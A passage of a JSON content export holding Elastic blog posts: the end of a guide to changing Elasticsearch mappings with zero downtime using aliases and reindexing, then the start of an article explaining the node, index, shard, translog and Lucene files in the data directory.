/\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eNow your application can speak to my_index as if it were a real index.\u003c/p\u003e\n \u003cp\u003eWhen you need to reindex your data, you can create a new index, appending a new version number:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPUT localhost:9200/my_index_v2 -H 'Content-Type: application/json' -d '\u003cbr /\u003e{ ... mappings ... }\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eReindex data from my_index_v1 to the new my_index_v2, then change the myindex alias to point to the new index, in a single atomic step:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPOST localhost:9200/_aliases -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"actions\": [\u003cbr /\u003e { \"remove\": {\u003cbr /\u003e \"alias\": \"my_index\",\u003cbr /\u003e \"index\": \"my_index_v1\"\u003cbr /\u003e }},\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index\",\u003cbr /\u003e \"index\": \"my_index_v2\"\u003cbr /\u003e }}\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eAnd finally, delete the old index:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XDELETE localhost:9200/my_index_v1\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eYou have successfully reindexed all of your data in the background without any downtime. Your application is blissfully unaware that the index has changed.\u003c/p\u003e\n \u003cp\u003eWhile this is the standard approach to managing schema changes, there are a number of other options available to you, which I will discuss below.\u003c/p\u003e\n \u003ch2 id=\"_i_don_8217_t_care_about_old_data\"\u003eI don't care about old data\u003c/h2\u003e\n \u003cp\u003eWhat if you want to change the datatype for a single field, and you don't care about the fact that the old data is not searchable? In this case, you have a few options:\u003c/p\u003e\n \u003ch3 id=\"_delete_the_mapping\"\u003eDelete the mapping\u003c/h3\u003e\n \u003cp\u003e\u003cstrong\u003eUpdate November 2, 2015: \u003c/strong\u003e\u003cem\u003ePlease note that delete mappings are not supported in \u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/release-we-have\"\u003e\u003cem\u003eElasticsearch 2.0+\u003c/em\u003e\u003c/a\u003e\u003cem\u003e.\u003c/em\u003e\u003cbr /\u003e\u003c/p\u003e\n \u003cp\u003eIf you \u003ca href=\"https://www.elastic.co/guide/reference/api/admin-indices-delete-mapping.html\"\u003edelete the mapping\u003c/a\u003e for a specific type, then you can use the \u003ca href=\"https://www.elastic.co/guide/reference/api/admin-indices-put-mapping/\"\u003eput_mapping API\u003c/a\u003e. to create a new mapping for that type in the existing index.\u003c/p\u003e\n \u003cblockquote\u003e\u003cstrong\u003eNote:\u003c/strong\u003e when you delete a mapping for a type, you also delete all documents of that type in the index.\u003c/blockquote\u003e\n \u003cp\u003eThis is particularly useful when you are wanting to change the mapping for a type which contains a small number of documents.\u003c/p\u003e\n \u003ch3 id=\"_rename_the_field\"\u003eRename the field\u003c/h3\u003e\n \u003cp\u003eAdding new fields is free, so you could just add a new field with a different name and definition to use for all future documents. Of course, this means changing the fieldname used by your application.\u003c/p\u003e\n \u003ch3 id=\"_upgrade_to_a_multi_field\"\u003eUpgrade to a multi-field\u003c/h3\u003e\n \u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/reference/mapping/multi-field-type/\"\u003eMulti-fields\u003c/a\u003e allow a single field to be used for different purposes. A typical use case is to index e.g. a title field in two ways: as an analyzed string for querying, and as anot_analyzed string for sorting.\u003c/p\u003e\n \u003cp\u003eAny scalar field (ie excluding fields of type object or nested) can be upgraded to a multi-field without reindexing, using the \u003ca href=\"https://www.elastic.co/guide/reference/api/admin-indices-put-mapping/\"\u003eput_mapping API\u003c/a\u003e. For instance, if we have a field called created which is currently mapped as a string:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003e{\u003cbr /\u003e \"created\": { \"type\": \"string\"}\u003cbr /\u003e}\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eWe can upgrade it to a multi-field, and add a date sub-field to it:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPUT localhost:9200/my_index/my_type/_mapping -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"my_type\": {\u003cbr /\u003e \"properties\": {\u003cbr /\u003e \"created\": {\u003cbr /\u003e \"type\": \"multi_field\",\u003cbr /\u003e \"fields\": {\u003cbr /\u003e \"created\": { \"type\": \"string\" },\u003cbr /\u003e \"date\": { \"type\": \"date\" }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eThe original created field still exists as the “main\" sub-field, and can be queried as created or created.created. The new date variant can be queried as created.date, and will only be populated for new documents.\u003c/p\u003e\n \u003ch2 id=\"_using_aliases_for_greater_flexibility\"\u003eUsing aliases for greater flexibility\u003c/h2\u003e\n \u003cp\u003eSometimes the above approaches are not enough. Perhaps your application has 100,000 user documents and 10,000,000 blog documents. You want to change the mapping for theuser documents without having to reindex all of the blogs.\u003c/p\u003e\n \u003cp\u003eThere is no reason that you can't store different types in different indices. Elasticsearch can search across multiple indices as easily as it can search across a single index. This way, you only need to reindex the index containing the type that you want to change. And with judicious use of aliases, the reindexing process can still be entirely transparent to your application.\u003c/p\u003e\n \u003cp\u003eWith this approach, your application should use a separate alias for each type. For instance, instead of indexing to my_index, you would index user docs to my_index_user andblog docs to my_index_blog:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPOST localhost:9200/_aliases -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"actions\": [\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index_user\",\u003cbr /\u003e \"index\": \"my_index_v2\"\u003cbr /\u003e }},\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index_blog\",\u003cbr /\u003e \"index\": \"my_index_v2\"\u003cbr /\u003e }}\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eTo search across user and blog documents, you can just specify both aliases:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl localhost:9200/my_index_blog,my_index_user/_search\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eWhen you want to change the user mapping, first create a new index just for users, and choose the right number of primary shards for just user docs:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPUT localhost:9200/my_index_users_v1 -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"settings\": {\u003cbr /\u003e \"index\": {\u003cbr /\u003e \"number_of_shards\": 1\u003cbr /\u003e }\u003cbr /\u003e },\u003cbr /\u003e \"mappings\": {\u003cbr /\u003e \"user\": { ... new user mapping ... }\u003cbr /\u003e }\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eReindex just the user docs from the old index into the new:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl 'localhost:9200/my_index_user/user?scroll=1m\u0026amp;search_type=scan' -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"size\": 1000\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eAnd update the alias:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPOST localhost:9200/_aliases -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"actions\": [\u003cbr /\u003e { \"remove\": {\u003cbr /\u003e \"alias\": \"my_index_user\",\u003cbr /\u003e \"index\": \"my_index_v2\"\u003cbr /\u003e }},\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index_user\",\u003cbr /\u003e \"index\": \"my_index_user_v1\"\u003cbr /\u003e }}\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eYou can use a \u003ca href=\"https://www.elastic.co/guide/reference/api/delete-by-query.html\"\u003edelete-by-query\u003c/a\u003e request to remove the user docs from the old index:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XDELETE localhost:9200/my_index_v1/user\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eFrom now on, any time you want to change the mapping for user docs, you can use the standard reindexing approach that I described above.\u003c/p\u003e\n \u003ch3 id=\"_using_aliases_without_reindexing\"\u003eUsing aliases without reindexing\u003c/h3\u003e\n \u003cp\u003eIf you want your changes to apply only to new documents, you can still use the aliases approach, without having to reindex. You would still create a new my_index_user_v1 index, but now you would create two aliases: my_index_user for indexing and my_index_users (plural) for searching:\u003c/p\u003e\u003cpre class=\"prettyprint \"\u003ecurl -XPOST localhost:9200/_aliases -H 'Content-Type: application/json' -d '\u003cbr /\u003e{\u003cbr /\u003e \"actions\": [\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index_user\",\u003cbr /\u003e \"index\": \"my_index_user_v1\"\u003cbr /\u003e }},\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index_users\",\u003cbr /\u003e \"index\": \"my_index_user_v1\"\u003cbr /\u003e }},\u003cbr /\u003e { \"add\": {\u003cbr /\u003e \"alias\": \"my_index_users\",\u003cbr /\u003e \"index\": \"my_index_v1\"\u003cbr /\u003e }},\u003cbr /\u003e ]\u003cbr /\u003e}\u003cbr /\u003e'\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eThe my_index_user alias points just to the new index, and all new user documents would be indexed using this alias. The my_index_users alias points to both the new index AND the old index. So you can search across both indices at the same time. The old index will use the old mapping, and the new index will use the new mapping.\u003c/p\u003e\n \u003cp\u003eAs you can see, Elasticsearch provides a wealth of options for managing your indices and, with a little forethought, changes can be managed with zero downtime.\u003c/p\u003e\n \u003cp\u003e\u003cbr /\u003e\u003c/p\u003e\n \u003cp\u003e\u003cem\u003eEditor’s Note (May 1, 2017): Starting with 6.0, any curl command to Elasticsearch containing content will require a valid content type header. As a result, this post has been updated to reflect this change and to set readers of this post up for success with future versions.\u003c/em\u003e\u003cbr /\u003e\u003c/p\u003e\n \u003caside id=\"post_tags\"\u003e\u003c/aside\u003e\n \u003c/article\u003e\n\u003c/section\u003e","category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T10:03:42.210Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":null,"markdown_l10n":"","product":["elasticsearch"],"publish_date":"2013-06-17T12:14:23.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"","og_markup":{"facebook_profile_id":""},"canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt3d820a0eae1c9158","ACL":{},"created_at":"2020-06-17T03:35:53.368Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2020-06-17T03:35:53.368Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:20.290Z","user":"blt4b2e1169881270a8"}}],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt9149a5fda79fd708","ACL":{},"created_at":"2023-11-06T20:37:49.356Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"deployment","label_l10n":"Deployment","tags":[],"title":"Deployment","updated_at":"2023-11-06T20:37:49.356Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.169Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"uid":"blt4a47bf681100e8ca","title":"Log management","label_l10n":"Log management","keyword":"log-management","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:42:23.694Z","updated_at":"2023-11-06T20:42:23.694Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.358Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"_version":1,"locale":"en-us","uid":"bltb1d5b7df835c3535","ACL":{},"created_at":"2023-11-06T21:38:33.456Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"continuous-monitoring","label_l10n":"Continuous monitoring","tags":[],"title":"Continuous monitoring","updated_at":"2023-11-06T21:38:33.456Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.388Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":null,"title":"Changing Mapping with Zero Downtime","title_l10n":"Changing Mapping with Zero Downtime","updated_at":"2024-09-12T19:54:45.300Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/changing-mapping-with-zero-downtime","versions":["Pre 1"],"publish_details":{"time":"2024-09-12T19:55:43.441Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltc2e5425f682f20d9","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt3e226bed76745129"],"body_l10n":"\u003cp\u003e\u003cstrong\u003eUPDATE:\u003c/strong\u003e This article refers to our hosted Elasticsearch offering by an older name, Found. Please note that Found is now known as Elastic Cloud.\u003c/p\u003e\n\u003cp\u003eIn this article we'll investigate the files written to the data directory by various parts of Elasticsearch. We will look at node, index and shard level files and give a short explanation of their contents in order to establish an understanding of the data written to disk by Elasticsearch.\u003c/p\u003e\n\u003csection id=\"elasticsearch-paths\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#elasticsearch-paths\"\u003eElasticsearch Paths\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eElasticsearch is configured with several paths:\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cstrong\u003epath.home\u003c/strong\u003e: Home directory of the user running the Elasticsearch process. Defaults to the Java system property user.dir, which is the default home directory for the process owner.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003epath.conf\u003c/strong\u003e: A directory containing the configuration files. This is usually set by setting the Java system property es.config, as it naturally has to be resolved before the configuration file is found.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003epath.plugins\u003c/strong\u003e: A directory whose sub-folders are Elasticsearch plugins. Sym-links are supported here, which can be used to selectively enable/disable a set of plugins for a certain Elasticsearch instance when multiple Elasticsearch instances are run from the same executable.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003epath.work\u003c/strong\u003e: A directory that was used to store working/temporary files for Elasticsearch. It’s no longer used.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003epath.logs\u003c/strong\u003e: Where the generated logs are stored. It might make sense to have this on a separate volume from the data directory in case one of the volumes runs out of disk space.\u003c/li\u003e\n \u003cli\u003e\u003cstrong\u003epath.data\u003c/strong\u003e: Path to a folder containing the data stored by Elasticsearch.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cp\u003eIn this article, we’ll have a closer look at the actual contents of the data directory (path.data) and try to gain an understanding of what all the files are used for.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"where-do-the-files-come-from\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#where-do-the-files-come-from\"\u003eWhere Do the Files Come from?\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eSince Elasticsearch uses Lucene under the hood to handle the indexing and querying on the shard level, the files in the data directory are written by both Elasticsearch and Lucene.\u003c/p\u003e\n \u003cp\u003eThe responsibilities of each is quite clear: Lucene is responsible for writing and maintaining the Lucene index files while Elasticsearch writes metadata related to features on top of Lucene, such as field mappings, index settings and other cluster metadata – end user and supporting features that do not exist in the low-level Lucene but are provided by Elasticsearch.\u003c/p\u003e\n \u003cp\u003eLet’s look at the outer levels of data written by Elasticsearch before we dive deeper and eventually find the Lucene index files.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"node-data\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#node-data\"\u003eNode Data\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eSimply starting Elasticsearch from a empty data directory yields the following directory tree:\u003c/p\u003e\u003cpre class=\"sourceCode bash prettyprint\"\u003e$ tree data\u003cbr /\u003edata\u003cbr /\u003e└── elasticsearch\u003cbr /\u003e └── nodes\u003cbr /\u003e └── 0\u003cbr /\u003e ├── _state\u003cbr /\u003e │\u0026nbsp;\u0026nbsp; └── global-0.st\u003cbr /\u003e └── node.lock\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eThe node.lock file is there to ensure that only one Elasticsearch installation is reading/writing from a single data directory at a time.\u003c/p\u003e\n \u003cp\u003eMore interesting is the global-0.st-file. The global-prefix indicates that this is a global state file while the .st extension indicates that this is a state file that contains metadata. As you might have guessed, this binary file contains global metadata about your cluster and the number after the prefix indicates the cluster metadata version, a strictly increasing versioning scheme that follows your cluster.\u003c/p\u003e\n \u003cblockquote\u003eWhile it is technically possible to edit these files with an hex editor in an emergency, it is strongly discouraged because it can quickly lead to data loss.\u003c/blockquote\u003e\n\u003c/section\u003e\n\u003csection id=\"index-data\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#index-data\"\u003eIndex Data\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eLet’s create a single shard index and look at the files changed by Elasticsearch:\u003c/p\u003e\u003cpre class=\"sourceCode bash prettyprint\"\u003e$ curl localhost:9200/foo -XPOST -H 'Content-Type: application/json' -d '{\"settings\":{\"index.number_of_shards\": 1}}'\u003cbr /\u003e{\"acknowledged\":true}\u003cbr /\u003e\u003cbr /\u003e$ tree -h data\u003cbr /\u003edata\u003cbr /\u003e└── [ 102] elasticsearch\u003cbr /\u003e └── [ 102] nodes\u003cbr /\u003e └── [ 170] 0\u003cbr /\u003e ├── [ 102] _state\u003cbr /\u003e │\u0026nbsp;\u0026nbsp; └── [ 109] global-0.st\u003cbr /\u003e ├── [ 102] indices\u003cbr /\u003e │\u0026nbsp;\u0026nbsp; └── [ 136] foo\u003cbr /\u003e │\u0026nbsp;\u0026nbsp; ├── [ 170] 0\u003cbr /\u003e │\u0026nbsp;\u0026nbsp; │\u0026nbsp;\u0026nbsp; ├── .....\u003cbr /\u003e │\u0026nbsp;\u0026nbsp; └── [ 102] _state\u003cbr /\u003e │\u0026nbsp;\u0026nbsp; └── [ 256] state-0.st\u003cbr /\u003e └── [ 0] node.lock\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eWe see that a new directory has been created corresponding to the index name. This directory has two sub-folders: _state and 0. The former contains what’s called a index state file (indices/{index-name}/_state/state-{version}.st), which contains metadata about the index, such as its creation timestamp. It also contains a unique identifier as well as the settings and the mappings for the index. The latter contains data relevant for the first (and only) shard of the index (shard 0). Next up, we’ll have a closer look at this.\u003c/p\u003e\n\u003c/section\u003e\n\u003csection id=\"shard-data\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#shard-data\"\u003eShard Data\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eThe shard data directory contains a state file for the shard that includes versioning as well as information about whether the shard is considered a primary shard or a replica.\u003c/p\u003e\u003cpre class=\"sourceCode bash prettyprint\"\u003e$ tree -h data/elasticsearch/nodes/0/indices/foo/0\u003cbr /\u003edata/elasticsearch/nodes/0/indices/foo/0\u003cbr /\u003e├── [ 102] _state\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; └── [ 81] state-0.st\u003cbr /\u003e├── [ 170] index\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; ├── [ 36] segments.gen\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; ├── [ 79] segments_1\u003cbr /\u003e│\u0026nbsp;\u0026nbsp; └── [ 0] write.lock\u003cbr /\u003e└── [ 102] translog\u003cbr /\u003e └── [ 17] translog-1429697028120\u003cbr /\u003e\u003c/pre\u003e\n \u003cp\u003eIn earlier Elasticsearch versions, separate {shard_id}/index/_checksums- files (and .cks-files) were also found in the shard data directory. In current versions these checksums are now found in the footers of the Lucene files instead, as Lucene has added end-to-end checksumming for all their index files.\u003c/p\u003e\n \u003cp\u003eThe {shard_id}/index directory contains files owned by Lucene. Elasticsearch generally does not write directly to this folder (except for older checksum implementation found in earlier versions). The files in these directories constitute the bulk of the size of any Elasticsearch data directory.\u003c/p\u003e\n \u003cp\u003eBefore we enter the world of Lucene, we’ll have a look at the Elasticsearch transaction log, which is unsurprisingly found in the per-shard translog directory with the prefix translog-. The transaction log is very important for the functionality and performance of Elasticsearch, so we’ll explain its use a bit closer in the next section.\u003c/p\u003e\n \u003csection id=\"per-shard-transaction-log\" class=\"level3\"\u003e\n \u003ch3\u003e\u003ca href=\"#per-shard-transaction-log\"\u003ePer-Shard Transaction Log\u003c/a\u003e\u003c/h3\u003e\n \u003cp\u003eThe \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules-translog.html\"\u003eElasticsearch transaction log\u003c/a\u003e makes sure that data can safely be indexed into Elasticsearch without having to perform a low-level Lucene commit for every document. Committing a Lucene index creates a new segment on the Lucene level which is fsync()-ed and results in a significant amount of disk I/O which affects performance.\u003c/p\u003e\n \u003cp\u003eIn order to accept a document for indexing and make it searchable without requiring a full Lucene commit, Elasticsearch adds it to the \u003ca href=\"http://lucene.apache.org/core/5_1_0/core/org/apache/lucene/index/IndexWriter.html\"\u003eLucene IndexWriter\u003c/a\u003e and appends it to the transaction log. After each \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-update-settings.html\"\u003erefresh_interval\u003c/a\u003e it will call reopen() on the Lucene indexes, which will make the data searchable without requiring a commit. This is part of the Lucene Near Real Time API. When the IndexWriter eventually commits due to either an automatic flush of the transaction log or due to an explicit \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-flush.html\"\u003eflush operation\u003c/a\u003e, the previous transaction log is discarded and a new one takes its place.\u003c/p\u003e\n \u003cp\u003eShould recovery be required, the segments written to disk in Lucene will be recovered first, then the transaction log will be replayed in order to prevent the loss of operations not yet fully committed to disk.\u003c/p\u003e\n \u003c/section\u003e\n\u003c/section\u003e\n\u003csection id=\"lucene-index-files\" class=\"level2\"\u003e\n \u003ch2\u003e\u003ca href=\"#lucene-index-files\"\u003eLucene Index Files\u003c/a\u003e\u003c/h2\u003e\n \u003cp\u003eLucene has done a good job at documenting the files in the \u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/package-summary.html#package_description\"\u003eLucene index directory\u003c/a\u003e, reproduced here for your convenience (the linked documentation in Lucene also goes into detail about the changes these files have gone through since all the way back to Lucene 2.1, so check it out):\u003c/p\u003e\n \u003ctable\u003e\n \u003cthead\u003e\n \u003ctr class=\"header\"\u003e\n \u003cth style=\"text-align: left;\"\u003eName \u003c/th\u003e\n \u003cth style=\"text-align: left;\"\u003eExtension \u003c/th\u003e\n \u003cth style=\"text-align: left;\"\u003eBrief Description \u003c/th\u003e\n \u003c/tr\u003e\n \u003c/thead\u003e\n \u003ctbody\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/index/SegmentInfos.html\"\u003eSegments File\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003esegments_N \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eStores information about a commit point \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/package-summary.html#Lock_File\"\u003eLock File\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003ewrite.lock \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eThe Write lock prevents multiple IndexWriters from writing to the same file. \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50SegmentInfoFormat.html\"\u003eSegment Info\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.si \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eStores metadata about a segment \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50CompoundFormat.html\"\u003eCompound File\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.cfs, .cfe \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eAn optional “virtual” file consisting of all the other index files for systems that frequently run out of file handles. \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50FieldInfosFormat.html\"\u003eFields\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.fnm \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eStores information about the fields \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50StoredFieldsFormat.html\"\u003eField Index\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.fdx \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eContains pointers to field data \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50StoredFieldsFormat.html\"\u003eField Data\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.fdt \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eThe stored fields for documents \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50PostingsFormat.html\"\u003eTerm Dictionary\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.tim \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eThe term dictionary, stores term info \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"odd\"\u003e\n \u003ctd style=\"text-align: left;\"\u003e\u003ca href=\"https://lucene.apache.org/core/5_1_0/core/org/apache/lucene/codecs/lucene50/Lucene50PostingsFormat.html\"\u003eTerm Index\u003c/a\u003e \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003e.tip \u003c/td\u003e\n \u003ctd style=\"text-align: left;\"\u003eThe index into the Term Dictionary \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr class=\"even\"\u003e\n \u003ctd 